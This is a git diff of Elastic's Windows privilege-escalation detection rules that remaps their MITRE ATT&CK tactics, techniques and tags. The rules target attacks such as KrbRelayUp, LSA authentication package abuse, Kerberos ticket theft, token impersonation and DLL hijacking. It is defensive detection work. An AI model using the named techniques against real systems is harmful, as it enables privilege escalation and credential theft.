[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index afe20aefbd0..b68b5bdb6c1 100644 --- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -41,7 +41,16 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "f0dbff4c-1aa7-4458-9ed5-ada472f64970" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -52,21 +61,27 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1136.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index cb6d429664b..45a02549dbd 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -59,7 +59,15 @@ references = [ risk_score = 47 rule_id = "5d676480-9655-4507-adc6-4eec311efff8" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,13 +82,14 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index 8886f6ecb8e..cec1e42a855 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -116,6 +116,36 @@ event.category:"driver" and host.os.type:windows and event.action:"load" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index 0d8afd54d72..d96ccf10bfe 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ references = [ risk_score = 47 rule_id = "d12bac54-ab2a-4159-933f-d7bcefa7b61d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -67,28 +75,31 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" -[[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" -[[rule.threat.technique.subtechnique]] -id = "T1553.002" -name = "Code Signing" -reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index c44702fa2da..7ce5473206a 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 73 rule_id = "dffbd37c-d4c5-46f8-9181-5afdd9172b4c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -89,13 +102,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml index b3ba3c4fba9..83c8fad1aea 100644 --- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml +++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -90,46 +90,36 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" +[[rule.threat.technique.subtechnique]] +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index c3f9d5e1b2e..1c705e82d44 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -112,36 +121,24 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index eca2ae97085..1542e312846 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -111,36 +121,41 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 6cdb156c937..52bf1177ba3 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -143,18 +143,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1574.010" -name = "Services File Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 9091212979e..337b065f9c5 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -58,7 +58,17 @@ references = [ risk_score = 73 rule_id = "e4e31051-ee01-4307-a6ee-b21b186958f4" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -79,31 +89,31 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index f843c0bda36..24dcc87b0fe 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -19,7 +19,16 @@ name = "Potential LSA Authentication Package Abuse" risk_score = 47 rule_id = "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,36 +79,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml index 95ae8823b78..291c41803d3 100644 --- a/rules/windows/privilege_escalation_make_token_local.toml +++ b/rules/windows/privilege_escalation_make_token_local.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -56,7 +56,14 @@ setup = """## Setup Audit event 4624 is needed to trigger this rule. """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,12 +86,10 @@ authentication where [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" @@ -95,30 +100,10 @@ id = "T1134.003" name = "Make and Impersonate Token" reference = "https://attack.mitre.org/techniques/T1134/003/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.003" -name = "Make and Impersonate Token" -reference = "https://attack.mitre.org/techniques/T1134/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml index 7647f482148..8302d80474b 100644 --- a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml +++ b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "sentinel_one_cloud_funnel", "m365_defender", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,13 +89,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 72f5e35f7c6..17355c1cbf2 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -135,18 +135,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml index c686464cf1d..ad3ad46e70b 100644 --- a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml +++ b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/24" [rule] author = ["Elastic"] @@ -53,7 +53,14 @@ references = ["https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-m risk_score = 47 rule_id = "e468f3f6-7c4c-45bb-846a-053738b3fe5d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,39 +74,22 @@ event.category:"authentication" and host.os.type:"windows" and winlog.logon.type [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 71a2d7cae7a..4cc497eaafe 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/02" [rule] author = ["Elastic"] @@ -75,7 +75,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -141,36 +151,53 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" 